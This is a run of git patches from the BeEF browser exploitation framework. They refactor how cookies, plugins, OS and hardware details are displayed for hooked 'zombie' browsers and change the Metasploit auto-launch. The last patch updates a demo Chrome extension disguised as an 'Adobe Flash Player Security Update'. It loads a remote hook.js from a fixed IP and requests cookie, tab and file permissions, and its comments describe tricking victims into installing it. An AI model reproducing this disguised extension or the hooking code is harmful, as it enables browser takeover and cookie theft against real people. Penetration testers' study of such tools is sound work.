-    # set and add the return values for hasPersistentCookies
-    has_persistent_cookies = BD.get(zombie_session, 'hasPersistentCookies')
-    if not has_persistent_cookies.nil?
-      encoded_has_persistent_cookies = CGI.escapeHTML(has_persistent_cookies)
-      encoded_has_persistent_cookies_hash = { 'Persistent Cookies' => encoded_has_persistent_cookies }
-
-      page_name_row = {
-        'category' => 'Browser',
-        'data' => encoded_has_persistent_cookies_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
- 
     @body = summary_grid_hash.to_json  
   end
-      
+
   # Returns the list of all command_modules in a JSON format
   def select_all_command_modules
     @body = command_modules2json(BeEF::Modules.get_enabled.keys)
diff --git a/extensions/console/lib/shellinterface.rb b/extensions/console/lib/shellinterface.rb
index 6c3ffd5a7..68fe1b5f0 100644
--- a/extensions/console/lib/shellinterface.rb
+++ b/extensions/console/lib/shellinterface.rb
@@ -43,7 +43,7 @@ class ShellInterface
     self.cmd = {}
   end
 
-  # This is a *modified* replica of select_command_modules_tree from extensions/admin_ui/controllers/modules/modules.rb
+  # @note Get commands. This is a *modified* replica of select_command_modules_tree from extensions/admin_ui/controllers/modules/modules.rb
   def getcommands
     
     return if self.targetid.nil?
@@ -263,8 +263,10 @@ class ShellInterface
           return "Verified Unknown"
       end
   end
-  
-  #Yoinked from the UI panel - we really need to centralise all this stuff and encapsulate it away??
+
+  # @note Returns a JSON array containing the summary for a selected zombie.
+  # Yoinked from the UI panel -
+  # we really need to centralise all this stuff and encapsulate it away.
   def select_zombie_summary
     
     return if self.targetsession.nil?
@@ -275,408 +277,81 @@ class ShellInterface
       'results' => []
     }
 
-    # set and add the return values for the page title
-    page_title = BD.get(self.targetsession, 'PageTitle') 
-    if not page_title.nil?
-      encoded_page_title = CGI.escapeHTML(page_title)
-      encoded_page_title_hash = { 'Page Title' => encoded_page_title }
-      
-      page_name_row = {
-        'category' => 'Hooked Page',
-        'data' => encoded_page_title_hash,
-        'from' => 'Initialization'
-      }
-      
-      summary_grid_hash['results'].push(page_name_row) # add the row
+    # zombie properties
+    # in the form of: category, UI label, value
+    zombie_properties = [
+
+        # Browser
+        ['Browser', 'Browser Name',       'BrowserName'],
+        ['Browser', 'Browser Version',    'BrowserVersion'],
+        ['Browser', 'Browser UA String',  'BrowserReportedName'],
+        ['Browser', 'Browser Platform',   'BrowserPlatform'],
+        ['Browser', 'Browser Plugins',    'BrowserPlugins'],
+        ['Browser', 'Window Size',        'WindowSize'],
+
+        # Browser Components
+        ['Browser Components', 'Flash',              'HasFlash'],
+        ['Browser Components', 'Java',               'JavaEnabled'],
+        ['Browser Components', 'VBScript',           'VBScriptEnabled'],
+        ['Browser Components', 'PhoneGap',           'HasPhonegap'],
+        ['Browser Components', 'Google Gears',       'HasGoogleGears'],
+        ['Browser Components', 'Silverlight',        'HasSilverlight'],
+        ['Browser Components', 'Web Sockets',        'HasWebSocket'],
+        ['Browser Components', 'QuickTime',          'HasQuickTime'],
+        ['Browser Components', 'ActiveX',            'HasActiveX'],
+        ['Browser Components', 'Session Cookies',    'hasSessionCookies'],
+        ['Browser Components', 'Persistent Cookies', 'hasPersistentCookies'],
+
+        # Hooked Page
+        ['Hooked Page', 'Page Title',    'PageTitle'],
+        ['Hooked Page', 'Page URI',      'PageURI'],
+        ['Hooked Page', 'Page Referrer', 'PageReferrer'],
+        ['Hooked Page', 'Host Name/IP',  'HostName'],
+        ['Hooked Page', 'Cookies',       'Cookies'],
+
+        # Host
+        ['Host', 'Date',             'DateStamp'],
+        ['Host', 'Operating System', 'OsName'],
+        ['Host', 'Hardware',         'Hardware'],
+        ['Host', 'CPU',              'CPU'],
+        ['Host', 'Screen Size',      'ScreenSize']
+    ]
+
+    # set and add the return values for each browser property
+    # in the form of: category, UI label, value
+    zombie_properties.each do |p|
+
+      case p[2]
+        when "BrowserName"
+          data   = BeEF::Core::Constants::Browsers.friendly_name(BD.get(zombie_session, p[2]))
+
+        when "ScreenSize"
+          screen_size_hash = JSON.parse(BD.get(zombie_session, p[2]).gsub(/\"\=\>/, '":')) # tidy up the string for JSON
+          width  = screen_size_hash['width']
+          height = screen_size_hash['height']
+          cdepth = screen_size_hash['colordepth']
+          data   = "Width: #{width}, Height: #{height}, Colour Depth: #{cdepth}"
+
+        when "WindowSize"
+          window_size_hash = JSON.parse(BD.get(zombie_session, p[2]).gsub(/\"\=\>/, '":')) # tidy up the string for JSON
+          width  = window_size_hash['width']
+          height = window_size_hash['height']
+          data   = "Width: #{width}, Height: #{height}"
+        else
+          data   = BD.get(zombie_session, p[2]) 
+      end
+
+      # add property to summary hash
+      if not data.nil?
+        summary_grid_hash['results'].push({
+          'category' => p[0],
+          'data'     => { p[1] => CGI.escapeHTML("#{data}") },
+          'from'     => 'Initialization'
+        })
+      end
+
     end
 
-    # set and add the return values for the page uri
-    page_uri = BD.get(self.targetsession, 'PageURI')
-    if not page_uri.nil?
-      encoded_page_uri = CGI.escapeHTML(page_uri)
-      encoded_page_uri_hash = { 'Page URI' => encoded_page_uri }
-
-      page_name_row = {
-        'category' => 'Hooked Page',
-        'data' => encoded_page_uri_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the return values for the page referrer
-    page_referrer = BD.get(self.targetsession, 'PageReferrer')
-    if not page_referrer.nil?
-      encoded_page_referrer = CGI.escapeHTML(page_referrer)
-      encoded_page_referrer_hash = { 'Page Referrer' => encoded_page_referrer }
-
-      page_name_row = {
-        'category' => 'Hooked Page',
-        'data' => encoded_page_referrer_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the return values for the host name
-    host_name = BD.get(self.targetsession, 'HostName') 
-    if not host_name.nil?
-      encoded_host_name = CGI.escapeHTML(host_name)
-      encoded_host_name_hash = { 'Hostname/IP' => encoded_host_name }
-    
-      page_name_row = {
-        'category' => 'Hooked Page',
-        'data' => encoded_host_name_hash,
-        'from' => 'Initialization'
-      }
-    
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-    
-	# set and add the return values for the date
-    date_stamp = BD.get(self.targetsession, 'DateStamp')
-    if not date_stamp.nil?
-      encoded_date_stamp = CGI.escapeHTML(date_stamp)
-      encoded_date_stamp_hash = { 'Date' => encoded_date_stamp }
-
-      page_name_row = {
-        'category' => 'Host',
-        'data' => encoded_date_stamp_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the return values for the os name
-    os_name = BD.get(self.targetsession, 'OsName')
-    if not os_name.nil?
-      encoded_os_name = CGI.escapeHTML(os_name)
-      encoded_os_name_hash = { 'OS Name' => encoded_os_name }
-
-      page_name_row = {
-        'category' => 'Host',
-        'data' => encoded_os_name_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the return values for the os name
-    hw_name = BD.get(self.targetsession, 'Hardware')
-    if not hw_name.nil?
-      encoded_hw_name = CGI.escapeHTML(hw_name)
-      encoded_hw_name_hash = { 'Hardware' => encoded_hw_name }
-
-      page_name_row = {
-        'category' => 'Host',
-        'data' => encoded_hw_name_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the return values for the browser name
-    browser_name = BD.get(self.targetsession, 'BrowserName') 
-    if not browser_name.nil?
-      friendly_browser_name = BeEF::Core::Constants::Browsers.friendly_name(browser_name)
-      browser_name_hash = { 'Browser Name' => friendly_browser_name }
-
-      browser_name_row = {
-        'category' => 'Browser',
-        'data' => browser_name_hash,
-        'from' => 'Initialization'
-      }
-    
-      summary_grid_hash['results'].push(browser_name_row) # add the row
-    end
-    
-    # set and add the return values for the browser version
-    browser_version = BD.get(self.targetsession, 'BrowserVersion') 
-    if not browser_version.nil?
-      encoded_browser_version = CGI.escapeHTML(browser_version)
-      browser_version_hash = { 'Browser Version' => encoded_browser_version }
-
-      browser_version_row = {
-        'category' => 'Browser',
-         'data' => browser_version_hash,
-        'from' => 'Initialization'
-      }
-    
-      summary_grid_hash['results'].push(browser_version_row) # add the row
-    end
-    
-    # set and add the return values for the browser ua string
-    browser_uastring = BD.get(self.targetsession, 'BrowserReportedName')
-    if not browser_uastring.nil?
-      browser_uastring_hash = { 'Browser UA String' => browser_uastring }
-
-      browser_uastring_row = {
-        'category' => 'Browser',
-         'data' => browser_uastring_hash,
-        'from' => 'Initialization'
-      }
-    
-      summary_grid_hash['results'].push(browser_uastring_row) # add the row
-    end
-    
-    # set and add the list of cookies
-    cookies = BD.get(self.targetsession, 'Cookies')
-    if not cookies.nil? and not cookies.empty?
-      encoded_cookies = CGI.escapeHTML(cookies)
-      encoded_cookies_hash = { 'Cookies' => encoded_cookies }
-      
-      page_name_row = {
-        'category' => 'Hooked Page',
-        'data' => encoded_cookies_hash,
-        'from' => 'Initialization'
-      }
-      
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-    
-    # set and add the list of plugins installed in the browser
-    browser_plugins = BD.get(self.targetsession, 'BrowserPlugins')
-    if not browser_plugins.nil? and not browser_plugins.empty?
-      encoded_browser_plugins = CGI.escapeHTML(browser_plugins)
-      encoded_browser_plugins_hash = { 'Browser Plugins' => encoded_browser_plugins }
-      
-      page_name_row = {
-        'category' => 'Browser',
-        'data' => encoded_browser_plugins_hash,
-        'from' => 'Initialization'
-      }
-      
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-    
-    # set and add the Browser Platform
-    system_platform = BD.get(self.targetsession, 'BrowserPlatform')
-    if not system_platform.nil?
-      encoded_system_platform = CGI.escapeHTML(system_platform)
-      encoded_system_platform_hash = { 'Browser Platform' => encoded_system_platform }
-
-      page_name_row = {
-        'category' => 'Browser',
-        'data' => encoded_system_platform_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the zombie screen size and color depth
-    screen_size = BD.get(self.targetsession, 'ScreenSize')
-    if not screen_size.nil?
-      
-      screen_size_hash = JSON.parse(screen_size.gsub(/\"\=\>/, '":')) # tidy up the string for JSON
-      width = screen_size_hash['width']
-      height = screen_size_hash['height']
-      colordepth = screen_size_hash['colordepth']
-
-      # construct the string to be displayed in the details tab
-      encoded_screen_size = CGI.escapeHTML("Width: "+width.to_s + ", Height: " + height.to_s + ", Colour Depth: " + colordepth.to_s)
-      encoded_screen_size_hash = { 'Screen Size' => encoded_screen_size }
-      
-      page_name_row = {
-        'category' => 'Host',
-        'data' => encoded_screen_size_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the zombie browser window size
-    window_size = BD.get(self.targetsession, 'WindowSize')
-    if not window_size.nil?
-
-      window_size_hash = JSON.parse(window_size.gsub(/\"\=\>/, '":')) # tidy up the string for JSON
-      width = window_size_hash['width']
-      height = window_size_hash['height']
-
-      # construct the string to be displayed in the details tab
-      encoded_window_size = CGI.escapeHTML("Width: "+width.to_s + ", Height: " + height.to_s)
-      encoded_window_size_hash = { 'Window Size' => encoded_window_size }
-
-      page_name_row = {
-        'category' => 'Browser',
-        'data' => encoded_window_size_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the yes|no value for JavaEnabled
-    java_enabled = BD.get(self.targetsession, 'JavaEnabled')
-    if not java_enabled.nil?
-      encoded_java_enabled = CGI.escapeHTML(java_enabled)
-      encoded_java_enabled_hash = { 'Java Enabled' => encoded_java_enabled }
-
-      page_name_row = {
-        'category' => 'Browser',
-        'data' => encoded_java_enabled_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the yes|no value for VBScriptEnabled
-    vbscript_enabled = BD.get(self.targetsession, 'VBScriptEnabled')
-    if not vbscript_enabled.nil?
-      encoded_vbscript_enabled = CGI.escapeHTML(vbscript_enabled)
-      encoded_vbscript_enabled_hash = { 'VBScript Enabled' => encoded_vbscript_enabled }
-
-      page_name_row = {
-        'category' => 'Browser',
-        'data' => encoded_vbscript_enabled_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the yes|no value for HasFlash
-    has_flash = BD.get(self.targetsession, 'HasFlash')
-    if not has_flash.nil?
-      encoded_has_flash = CGI.escapeHTML(has_flash)
-      encoded_has_flash_hash = { 'Has Flash' => encoded_has_flash }
-
-      page_name_row = {
-        'category' => 'Browser',
-        'data' => encoded_has_flash_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the yes|no value for HasPhonegap
-    has_phonegap = BD.get(self.targetsession, 'HasPhonegap')
-    if not has_phonegap.nil?
-      encoded_has_phonegap = CGI.escapeHTML(has_phonegap)
-      encoded_has_phonegap_hash = { 'Has Phonegap' => encoded_has_phonegap }
-
-      page_name_row = {
-        'category' => 'Browser',
-        'data' => encoded_has_phonegap_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the yes|no value for HasGoogleGears
-    has_googlegears = BD.get(self.targetsession, 'HasGoogleGears')
-    if not has_googlegears.nil?
-      encoded_has_googlegears = CGI.escapeHTML(has_googlegears)
-      encoded_has_googlegears_hash = { 'Has GoogleGears' => encoded_has_googlegears }
-
-      page_name_row = {
-        'category' => 'Browser',
-        'data' => encoded_has_googlegears_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the yes|no value for HasWebSocket
-    has_web_socket = BD.get(self.targetsession, 'HasWebSocket')
-    if not has_web_socket.nil?
-      encoded_has_web_socket = CGI.escapeHTML(has_web_socket)
-      encoded_has_web_socket_hash = { 'Has GoogleGears' => encoded_has_web_socket }
-
-      page_name_row = {
-        'category' => 'Browser',
-        'data' => encoded_has_web_socket_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the yes|no value for HasActiveX
-    has_activex = BD.get(self.targetsession, 'HasActiveX')
-    if not has_activex.nil?
-      encoded_has_activex = CGI.escapeHTML(has_activex)
-      encoded_has_activex_hash = { 'Has ActiveX' => encoded_has_activex }
-
-      page_name_row = {
-        'category' => 'Browser',
-        'data' => encoded_has_activex_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the yes|no value for HasSilverlight
-    has_silverlight = BD.get(zombie_session, 'HasSilverlight')
-    if not has_silverlight.nil?
-      encoded_has_silverlight = CGI.escapeHTML(has_silverlight)
-      encoded_has_silverlight_hash = { 'Has Silverlight' => encoded_has_silverlight }
-
-      page_name_row = {
-        'category' => 'Browser',
-        'data' => encoded_has_silverlight_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the value for CPU
-    cpu_type = BD.get(zombie_session, 'CPU')
-    if not cpu_type.nil?
-      encoded_cpu_type = CGI.escapeHTML(cpu_type)
-      encoded_cpu_type_hash = { 'CPU' => encoded_cpu_type }
-
-      page_name_row = {
-        'category' => 'Host',
-        'data' => encoded_cpu_type_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the return values for hasSessionCookies
-    has_session_cookies = BD.get(self.targetsession, 'hasSessionCookies')
-    if not has_session_cookies.nil?
-      encoded_has_session_cookies = CGI.escapeHTML(has_session_cookies)
-      encoded_has_session_cookies_hash = { 'Session Cookies' => encoded_has_session_cookies }
-
-      page_name_row = {
-        'category' => 'Browser',
-        'data' => encoded_has_session_cookies_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the return values for hasPersistentCookies
-    has_persistent_cookies = BD.get(self.targetsession, 'hasPersistentCookies')
-    if not has_persistent_cookies.nil?
-      encoded_has_persistent_cookies = CGI.escapeHTML(has_persistent_cookies)
-      encoded_has_persistent_cookies_hash = { 'Persistent Cookies' => encoded_has_persistent_cookies }
-
-      page_name_row = {
-        'category' => 'Browser',
-        'data' => encoded_has_persistent_cookies_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
- 
     summary_grid_hash
   end
   

From 2d27266fc91e82ba61dd27f69920e7d9e9b790c5 Mon Sep 17 00:00:00 2001
From: bmantra <bart.leppens@gmail.com>
Date: Wed, 6 Feb 2013 19:22:12 +0100
Subject: [PATCH 200/397] added message that metasploit auto launch is not
 available on MS Windows

---
 extensions/metasploit/rpcclient.rb | 51 ++++++++++++++++--------------
 1 file changed, 28 insertions(+), 23 deletions(-)

diff --git a/extensions/metasploit/rpcclient.rb b/extensions/metasploit/rpcclient.rb
index 7b7eacd25..d024f831d 100644
--- a/extensions/metasploit/rpcclient.rb
+++ b/extensions/metasploit/rpcclient.rb
@@ -36,10 +36,12 @@ module Metasploit
 			#auto start msfrpcd
 			if (@config['auto_msfrpcd'] || false)
 				launch_msf = ''
+				msf_os = ''
 				@config['msf_path'].each do |path|
 					if File.exist?(path['path'] + 'msfrpcd')
 						launch_msf = path['path'] + 'msfrpcd'
 						print_info 'Found msfrpcd: ' + launch_msf
+						msf_os = path['os'] 
 					end
 				end
 				if (launch_msf.length > 0)
@@ -53,32 +55,35 @@ module Metasploit
 					end
 
 					msf_url += opts[:host] + ':' + opts[:port].to_s() + opts[:uri]
+					if msf_os.eql? "win"
+						print_info 'BeEF auto-connect with  metasploit is currently not supported on MS Windows.'
+					else	
+						child = IO.popen([launch_msf, "-f", argssl, "-P" , @config['pass'], "-U" , @config['user'], "-u" , opts[:uri], "-a" , opts[:host], "-p" , opts[:port].to_s()], 'r+')
 				
-					child = IO.popen([launch_msf, "-f", argssl, "-P" , @config['pass'], "-U" , @config['user'], "-u" , opts[:uri], "-a" , opts[:host], "-p" , opts[:port].to_s()], 'r+')
-				
-					print_info 'Attempt to start msfrpcd, this may take a while. PID: ' + child.pid.to_s
+						print_info 'Attempt to start msfrpcd, this may take a while. PID: ' + child.pid.to_s
 
-					#Give daemon time to launch
-					#poll and giveup after timeout 
-					retries = @config['auto_msfrpcd_timeout']
-					uri = URI(msf_url)
-					http = Net::HTTP.new(uri.host, uri.port)
+						#Give daemon time to launch
+						#poll and giveup after timeout 
+						retries = @config['auto_msfrpcd_timeout']
+						uri = URI(msf_url)
+						http = Net::HTTP.new(uri.host, uri.port)
 
-					if opts[:ssl]
-						http.use_ssl = true
-					end
-					if not @config['ssl_verify']
-						http.verify_mode = OpenSSL::SSL::VERIFY_NONE
-					end
-					headers = {
-    						'Content-Type' => "binary/message-pack"
-					}
-					path = uri.path.empty? ? "/" : uri.path
-					begin
-						sleep 1
-						code = http.head(path, headers).code.to_i
-					rescue Exception
-						retry if (retries -= 1) > 0
+						if opts[:ssl]
+							http.use_ssl = true
+						end
+						if not @config['ssl_verify']
+							http.verify_mode = OpenSSL::SSL::VERIFY_NONE
+						end
+						headers = {
+    							'Content-Type' => "binary/message-pack"
+						}
+						path = uri.path.empty? ? "/" : uri.path
+						begin
+							sleep 1
+							code = http.head(path, headers).code.to_i
+						rescue Exception
+							retry if (retries -= 1) > 0
+						end
 					end
 				else
 					print_error 'Please add a custom path for msfrpcd to the config-file.'

From f879584f1b142fdc979f371e3a2545ba5393bd78 Mon Sep 17 00:00:00 2001
From: bmantra <bart.leppens@gmail.com>
Date: Wed, 6 Feb 2013 19:37:31 +0100
Subject: [PATCH 201/397] changed windows default path and changed message

---
 extensions/metasploit/config.yaml  | 4 ++--
 extensions/metasploit/rpcclient.rb | 2 +-
 2 files changed, 3 insertions(+), 3 deletions(-)

diff --git a/extensions/metasploit/config.yaml b/extensions/metasploit/config.yaml
index 5d445f4d2..7303ddad2 100644
--- a/extensions/metasploit/config.yaml
+++ b/extensions/metasploit/config.yaml
@@ -25,7 +25,7 @@ beef:
             ssl_verify: true
             callback_host: "127.0.0.1"
             autopwn_url: "autopwn"
-            auto_msfrpcd: false
+            auto_msfrpcd: true
             auto_msfrpcd_timeout: 120
             msf_path: [ 
               {os: 'osx', path: '/opt/local/msf/'},
@@ -33,6 +33,6 @@ beef:
               {os: 'bt5r3', path: '/opt/metasploit/msf3/'},
               {os: 'bt5', path: '/opt/framework3/msf3/'},
               {os: 'backbox', path: '/opt/metasploit3/msf3/'},
-              {os: 'win', path: 'c:\metasploit\msf3\'},
+              {os: 'win', path: 'c:\\metasploit-framework\\'},
               {os: 'custom', path: ''}
             ]
diff --git a/extensions/metasploit/rpcclient.rb b/extensions/metasploit/rpcclient.rb
index d024f831d..b0f62fd6c 100644
--- a/extensions/metasploit/rpcclient.rb
+++ b/extensions/metasploit/rpcclient.rb
@@ -56,7 +56,7 @@ module Metasploit
 
 					msf_url += opts[:host] + ':' + opts[:port].to_s() + opts[:uri]
 					if msf_os.eql? "win"
-						print_info 'BeEF auto-connect with  metasploit is currently not supported on MS Windows.'
+						print_info 'Metasploit auto-launch is currently not supported in BeEF on MS Windows.'
 					else	
 						child = IO.popen([launch_msf, "-f", argssl, "-P" , @config['pass'], "-U" , @config['user'], "-u" , opts[:uri], "-a" , opts[:host], "-p" , opts[:port].to_s()], 'r+')
 				

From 17aa898099a2b1f53a20980b6f13e84aa50e54f6 Mon Sep 17 00:00:00 2001
From: bmantra <bart.leppens@gmail.com>
Date: Wed, 6 Feb 2013 19:42:14 +0100
Subject: [PATCH 202/397] correct last commit, set auto_msfrpcd back to false

---
 extensions/metasploit/config.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/extensions/metasploit/config.yaml b/extensions/metasploit/config.yaml
index 7303ddad2..6c52a2f56 100644
--- a/extensions/metasploit/config.yaml
+++ b/extensions/metasploit/config.yaml
@@ -25,7 +25,7 @@ beef:
             ssl_verify: true
             callback_host: "127.0.0.1"
             autopwn_url: "autopwn"
-            auto_msfrpcd: true
+            auto_msfrpcd: false
             auto_msfrpcd_timeout: 120
             msf_path: [ 
               {os: 'osx', path: '/opt/local/msf/'},

From 90174dda23a8315407cdada0c3c95fc69e4830ef Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Mon, 11 Feb 2013 02:46:35 +1030
Subject: [PATCH 203/397] Add beef.hardware.isTouchEnabled()

---
 core/main/client/browser.js                        | 2 ++
 core/main/client/hardware.js                       | 5 +++++
 core/main/handlers/browserdetails.rb               | 8 ++++++++
 extensions/admin_ui/controllers/modules/modules.rb | 3 ++-
 extensions/console/lib/shellinterface.rb           | 3 ++-
 5 files changed, 19 insertions(+), 2 deletions(-)

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index 9d3cc9beb..8b6fabf4d 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -2061,6 +2061,7 @@ beef.browser = {
         var os_name = beef.os.getName();
         var hw_name = beef.hardware.getName();
         var cpu_type = beef.hardware.cpuType();
+        var touch_enabled = (beef.hardware.isTouchEnabled()) ? "Yes" : "No";
         var browser_platform = (typeof(navigator.platform) != "undefined" && navigator.platform != "") ? navigator.platform : null;
         var browser_type = JSON.stringify(beef.browser.type(), function (key, value) {
             if (value == true) return value; else if (typeof value == 'object') return value; else return;
@@ -2092,6 +2093,7 @@ beef.browser = {
         if (os_name) details['OsName'] = os_name;
         if (hw_name) details['Hardware'] = hw_name;
         if (cpu_type) details['CPU'] = cpu_type;
+        if (touch_enabled) details['TouchEnabled'] = touch_enabled;
         if (date_stamp) details['DateStamp'] = date_stamp;
         if (browser_platform) details['BrowserPlatform'] = browser_platform;
         if (browser_type) details['BrowserType'] = browser_type;
diff --git a/core/main/client/hardware.js b/core/main/client/hardware.js
index 936d4c712..c607599ef 100644
--- a/core/main/client/hardware.js
+++ b/core/main/client/hardware.js
@@ -26,6 +26,11 @@ beef.hardware = {
 		return "32-bit";
 	},
 
+	isTouchEnabled: function() {
+		if ('ontouchstart' in document) return true;
+		return false;
+	},
+
 	isVirtualMachine: function() {
 		if (screen.width % 2 || screen.height % 2) return true;
 		return false;
diff --git a/core/main/handlers/browserdetails.rb b/core/main/handlers/browserdetails.rb
index 97761aa5d..bf36bcd73 100644
--- a/core/main/handlers/browserdetails.rb
+++ b/core/main/handlers/browserdetails.rb
@@ -279,6 +279,14 @@ module BeEF
             self.err_msg "Invalid value for CPU returned from the hook browser's initial connection."
           end
 
+          # get and store the value for TouchEnabled
+          touch_enabled = get_param(@data['results'], 'TouchEnabled')
+          if BeEF::Filters.is_valid_yes_no?(touch_enabled)
+            BD.set(session_id, 'TouchEnabled', touch_enabled)
+          else
+            self.err_msg "Invalid value for TouchEnabled returned from the hook browser's initial connection."
+          end
+
           # get and store whether the browser has session cookies enabled
           has_session_cookies = get_param(@data['results'], 'hasSessionCookies')
           if BeEF::Filters.is_valid_yes_no?(has_session_cookies)
diff --git a/extensions/admin_ui/controllers/modules/modules.rb b/extensions/admin_ui/controllers/modules/modules.rb
index 79ed04767..da13e62bf 100644
--- a/extensions/admin_ui/controllers/modules/modules.rb
+++ b/extensions/admin_ui/controllers/modules/modules.rb
@@ -98,7 +98,8 @@ class Modules < BeEF::Extension::AdminUI::HttpController
         ['Host', 'Operating System', 'OsName'],
         ['Host', 'Hardware',         'Hardware'],
         ['Host', 'CPU',              'CPU'],
-        ['Host', 'Screen Size',      'ScreenSize']
+        ['Host', 'Screen Size',      'ScreenSize'],
+        ['Host', 'Touch Screen',     'TouchEnabled']
     ]
 
     # set and add the return values for each browser property
diff --git a/extensions/console/lib/shellinterface.rb b/extensions/console/lib/shellinterface.rb
index 68fe1b5f0..72798a756 100644
--- a/extensions/console/lib/shellinterface.rb
+++ b/extensions/console/lib/shellinterface.rb
@@ -314,7 +314,8 @@ class ShellInterface
         ['Host', 'Operating System', 'OsName'],
         ['Host', 'Hardware',         'Hardware'],
         ['Host', 'CPU',              'CPU'],
-        ['Host', 'Screen Size',      'ScreenSize']
+        ['Host', 'Screen Size',      'ScreenSize'],
+        ['Host', 'Touch Screen',     'TouchEnabled']
     ]
 
     # set and add the return values for each browser property

From 074a11c85a516942b2f986506d64766ae1a4c1e9 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Tue, 12 Feb 2013 10:53:19 +0000
Subject: [PATCH 204/397] Updated Chrome sample extension with latest
 requirements (CSP/version/etc.). Not it works on latest Chrome. Also Updated
 the fake_flash_update description with more info.

---
 .../background.js                             |  5 +-
 .../manifest.json                             | 54 +++++++++++--------
 .../fake_flash_update/config.yaml             |  2 +-
 3 files changed, 35 insertions(+), 26 deletions(-)

diff --git a/extensions/demos/flash_update_chrome_extension/background.js b/extensions/demos/flash_update_chrome_extension/background.js
index aa364ae45..ff6c7b92a 100644
--- a/extensions/demos/flash_update_chrome_extension/background.js
+++ b/extensions/demos/flash_update_chrome_extension/background.js
@@ -6,5 +6,6 @@
 
 d=document;
 e=d.createElement('script');
-e.src="http://127.0.0.1:3000/hook.js";
-d.body.appendChild(e); 
+e.src="https://192.168.0.2/hook.js";
+d.body.appendChild(e);
+
diff --git a/extensions/demos/flash_update_chrome_extension/manifest.json b/extensions/demos/flash_update_chrome_extension/manifest.json
index 7e2c4fa44..78b46fe06 100644
--- a/extensions/demos/flash_update_chrome_extension/manifest.json
+++ b/extensions/demos/flash_update_chrome_extension/manifest.json
@@ -1,26 +1,34 @@
 {
-  // Simple chrome extension 
-  // Just loads beef into the extension context.
-  // 
-  // You may need to set the IP address of the beef hook in background.js
-  // Then you can pack the extension (from within the chrome extensions page) and add the crx file to extensions/demos/html/ 
+    // Simple chrome extension, by antisnatchor and Mike Haworth
+    // Just loads BeEF into the extension context.
+    //
+    // 1. You need to set the IP address (better the domain) of the BeEF hook in background.js
+    // 2. The BeEF hook address must be == to the CSP allowed domain here below. BeEF must listen on port 443, with TLS enabled.
+    //    Only localhost origin is allowed to load scripts from non HTTPS resources. For anything else, you must use HTTPS.
+    // 4. You need to upload the extension, as a zip file, to Google Chrome store.
+    //    In latest versions of Chrome (>= 21) you can't install an extension from a different location anymore,
+    //    so the extension can't be served by BeEF anymore. You need to trick the victim to install
+    //    the extension from Google Chrome store.
+    //
 
-  "name": "Adobe Flash Player",
-  "version": "11.2.202.235",
-  "description": "Introduces vulnerabilites into web browsers",
-  "background": {
-    "scripts": ["background.js"]
-  },
-  "icons": { 
-    "16": "icon16.png",
-    "48": "icon48.png",
-    "128": "icon128.png" 
-  },
-  "permissions": [
-	"tabs", 
-	"http://*/*", 
-	"https://*/*",
-  "file://*/*",
-  "cookies"
-  ]
+    "name": "Adobe Flash Player Security Update",
+    "manifest_version": 2,
+    "version": "11.5.502.149",
+    "description": "Updates Adobe Flash Player with latest securty updates",
+    "background": {
+        "scripts": ["background.js"]
+    },
+    "content_security_policy": "script-src 'self' 'unsafe-eval' https://192.168.0.2; object-src 'self'",
+    "icons": {
+        "16": "icon16.png",
+        "48": "icon48.png",
+        "128": "icon128.png"
+    },
+    "permissions": [
+        "tabs",
+        "http://*/*",
+        "https://*/*",
+        "file://*/*",
+        "cookies"
+    ]
 }
diff --git a/modules/social_engineering/fake_flash_update/config.yaml b/modules/social_engineering/fake_flash_update/config.yaml
index c62fcb60d..8922b69dc 100644
--- a/modules/social_engineering/fake_flash_update/config.yaml
+++ b/modules/social_engineering/fake_flash_update/config.yaml
@@ -9,7 +9,7 @@ beef:
             enable: true
             category: "Social Engineering"
